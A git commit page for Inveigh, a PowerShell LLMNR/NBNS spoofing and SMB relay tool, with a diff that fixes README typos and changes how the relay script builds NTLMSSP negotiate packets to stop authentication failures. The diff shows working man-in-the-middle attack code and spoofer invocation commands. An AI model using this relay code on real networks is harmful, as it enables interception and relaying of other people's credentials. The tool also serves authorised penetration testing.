diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-02-06 22:55:51 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-02-06 22:55:51 -0500 |
| commit | 475f82d7b3dffd36a913a14bd4073ec472c430f2 (patch) | |
| tree | 7e323e6ade9ba14511c5a0a584b20c6e2ae2d024 | |
| parent | 4ec48bad98135e578c91c30e9cee0bf2cbce36d8 (diff) | |
| download | Inveigh-475f82d7b3dffd36a913a14bd4073ec472c430f2.tar.gz Inveigh-475f82d7b3dffd36a913a14bd4073ec472c430f2.zip | |
Fixed a bug that was causing auth failures during SMB relay
| -rw-r--r-- | README.md | 4 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 6 |
2 files changed, 5 insertions, 5 deletions
@@ -68,7 +68,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design Import-Module ./Inveigh.ps1;Invoke-Inveigh * To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled. - Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y + Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -NBNS Y ##### Screenshot:  @@ -150,7 +150,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design Invoke-InveighUnprivileged * To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes. - Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30 + Invoke-InveighUnprivileged -ConsoleOutput Y -FileOutput Y -RunTime 30 ##### Screenshot:  diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index b7f687b..ef5d74a 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -1445,7 +1445,7 @@ $SMB_relay_challenge_scriptblock = if($SMB_version -eq 'SMB1') { $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 - $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f + $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.length-8)..($HTTP_request_bytes.length)] $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate @@ -1458,7 +1458,7 @@ $SMB_relay_challenge_scriptblock = { $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f + $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.length-8)..($HTTP_request_bytes.length)] $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate @@ -2516,7 +2516,7 @@ $HTTP_scriptblock = $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] $SMB_session_ID = $SMB_relay_bytes[44..51] - + if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42') { $SMB_version -eq 'SMB1' |